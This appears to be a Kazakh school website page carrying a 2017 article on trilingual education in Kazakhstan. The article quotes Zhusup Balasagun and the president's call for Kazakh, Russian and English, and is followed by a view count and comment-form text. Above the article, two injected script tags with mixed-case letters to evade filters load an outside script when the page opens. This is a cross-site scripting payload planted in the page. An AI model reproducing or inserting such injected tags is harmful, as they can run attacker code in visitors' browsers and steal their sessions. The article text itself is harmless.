<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.01.2017

 

       Үш тілде оқыту – заман талабы.

 

                                                   Тіл адамды көкке көтереді,

                                                         тіл арқылы ол бақытқа

жетеді.

                                                                                        

            Жүсіп Баласағұн

 

                                                             

     

Негізгі мақсаты: бірнеше тілді меңгерген, әлеуметтік және кәсіптік

анықтауға қабілетті мәдениетті тұлғаны дамыту және қалыптастыру.

    Cапалы

білім беруді және жоғары танымды қалыптастыруға ұмтылу, білім шекарасын

жылжыту, оқушыларды өмірге даярлау – жаңа әлемде нақты қос не көптілділік болып

табылады.      Тіл - жүректің үні ғана емес , ұлттық рухтың абыройы мен болмысы. Ал, үштілділік - нақты тұлға, ұжым, халықтың белгілі бір қоғамда қарым-қатынас үдерісінде қажет болған жағдайда үш түрлі тілді алма-кезек қолдану құбылысы.
      “Тілдердің үштұғырлығы мәдени жобасын кезеңдеп жүзеге асыруды қолға алуды ұсынамын. Қазақстан бүкіл әлемге халқы үш тілді пайдаланатын мәдениетті ел ретінде танылуға тиіс. Бұлар - қазақ тілі - мемлекеттік тіл, орыс тілі - ұлтаралық қатынас тілі және ағылшын тілі - жаһандық экономикаға ойдағыдай кіру тілі” деген Елбасымыз Нұрсұлтан Әбішұлының салиқалы үндеуінен бастау алған болатын.

Просмотров: 521

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу